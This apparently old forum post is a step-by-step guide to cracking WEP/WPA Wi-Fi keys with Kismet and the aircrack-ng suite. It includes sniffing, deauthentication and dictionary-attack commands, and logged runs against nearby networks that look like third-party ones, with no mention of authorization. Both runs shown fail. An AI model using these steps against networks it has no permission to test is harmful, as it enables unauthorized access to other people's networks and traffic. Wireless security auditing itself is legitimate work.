Cracking WEP/WPA Access Point log example

Threaded Mode | Linear Mode

Cracking WEP/WPA Access Point log example

Author Message

Langy
Administrator

Posts: 8.461
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 10

Post: #1

Cracking WEP/WPA Access Point log example

What is aircrack:

Code:

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover

keys once enough data packets have been captured. It implements the standard 

FMS attack along with some optimizations like KoreK attacks, as well as the 

all-new PTW attack, thus making the attack much faster compared to other WEP

cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

www.aircrack-ng.org

Download / Install aircrack-ng (deb):

Code:

langy@googlebig:~$ sudo apt-get install aircrack-ng

Code:

wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz

tar -zxvf aircrack-ng-1.0-rc1.tar.gz

cd aircrack-ng-1.0-rc1

make

make install

For more information go here.

Aircrack-ng suite include this tools:

Code:

aircrack-ng   airdriver-ng  airmon-ng     airolib-ng    airtun-ng

airdecap-ng   aireplay-ng   airodump-ng   airserv-ng

In this example of WEP crack we will use:

1) Kismet (Wireless network detector)
2) airodump-ng (Sniffing packages)
3) aireplay-ng (is used to inject frames)
4) aircrack-ng (Brute force on pagackes sniffed)

------------------------------------------------------------------------------
1) Kismet (Wireless network detector)
Download / Install Kismet (deb):

Code:

langy@googlebig:~$ sudo apt-get install kismet

www.kismetwireless.net

Start kismet

Code:

langy@googlebig:~$ sudo kismet

With Kismet we can see all available wireless connection with all informations that we need. (client connected, channel and SSID etc.)

2) airodump-ng (Sniffing packages)
airodump-ng --channel <channel> -b <bssid> <interface> --write <file>

Example:

Code:

langy@googlebig:~$ sudo airodump-ng --channel 11 wlan0 --write testsnif

CH 11 ][ Elapsed: 8 mins ][ 2008-10-06 22:28                                  

 BSSID     PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES

XX:69:31:1E  0   0        0       0    0  11  48  WEP  WEP   A

XX:62:33:30  0  90     4933   18187   32  11  54. WPA  TKIP   PSK  N

XX:40:6F:BC  -1   0        0      646    0  11  -1  OPN      < 

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes       

XX:62:33:30  XX:8F:DA:FA   -1  36- 0    0    17845               

(not associated)   XX:32:52:40   0   0- 1    0    97  default,DLINK

(not associated)   XX:12:78:50   0   0- 1    0    49               

(not associated)   XX:9D:CA:32   0   0- 1    0    36  HotSpot Resid

(not associated)   XX:A2:2C:CC   0   0- 1    0    12               

(not associated)   XX:4B:B0:FC   0   0- 1    0    56  HotSpot Resid

(not associated)   XX:02:ED:70   0   0- 1    0    15  HotSpot Resid

(not associated)   XX:2C:DB:D3   0   0- 1    0    5  3Com 

XX:40:6F:BC  XX:8E:F4:78   0   0- 1     0     761  foti

This sniff will save testing_snif-01.cap in our home folder.

3) aireplay-ng (is used to inject frames)
aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <interface>

With this command we can take handshakes packages.

aireplay-ng is used simultaneously with airodump-ng!

4) aircrack (Brute force on pagackes sniffed)
aircrack-ng -w <wordlist> -b <bssid> <file.cap>

You can find a good wordlist on St4ck website
Download: wordlist.zip

Example of handshakes failed:

Code:

langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap

Opening /home/langy/testsnif-01.cap

Read 45077 packets.

   #  BSSID              ESSID                     Encryption

   1  XX:62:33:30  NETGEAR                   WPA (0 handshake)

   2  XX:40:6F:BC                            None (192.168.2.5)

   3  XX:F0:85:58  dado                      No data - WEP or WPA

   4  XX:69:31:1E  Alice-382XXXX            No data - WEP or WPA

Index number of target network ? 1

Opening /home/langy/testsnif-01.cap

No valid WPA handshakes found..

Quitting aircrack-ng...

langy@googlebig:~$

Example of insufficient IVs:

Code:

langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap

Opening /home/langy/test2snif-01.cap

Opening /home/langy/test3snif-01.cap

Opening /home/langy/test4snif-01.cap

Opening /home/langy/testing_snif-01.cap

Opening /home/langy/testsnif-01.cap

Read 192412 packets.

   #  BSSID              ESSID                     Encryption

   1  XX:62:33:30  NETGEAR                   WPA (0 handshake)

   2  XX:00:3C:A5  HotSpot Residence  None (0.0.0.0)

   3  XX:69:31:1E  Alice-382XXXX            No data - WEP or WPA

   4  XX:56:66:F0  TESTING CENTER            WEP (7340 IVs)

   5  XX:D4:46:60                            No data - WEP or WPA

   6  XX:6D:92:D0                            Unknown

   7  XX:40:6F:BC                            None (192.168.2.5)

   8  XX:F0:85:58  dado                      No data - WEP or WPA

Index number of target network ? 4

Opening /home/langy/test2snif-01.cap

Opening /home/langy/test3snif-01.cap

Opening /home/langy/test4snif-01.cap

Opening /home/langy/testing_snif-01.cap

Opening /home/langy/testsnif-01.cap

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 2677 ivs.

                                 Aircrack-ng 1.0 beta1

                 [00:00:58] Tested 167049 keys (got 2677 IVs)

   KB    depth   byte(vote)

    0   55/ 56   FC(3328) 02(3072) 0F(3072) 12(3072) 13(3072) 

    1    9/ 15   03(4352) 23(4096) 2A(4096) 5D(4096) 88(4096) 

    2    1/  2   5F(5120) AE(4352) C4(4352) 05(4096) 0E(4096) 

    3   12/  3   ED(4096) 05(3840) 27(3840) 2A(3840) 32(3840) 

    4   17/  4   C1(4352) 73(4096) FC(4096) 29(3840) 50(3840) 

Failed. Next try with 5000 IVs.

Quitting aircrack-ng...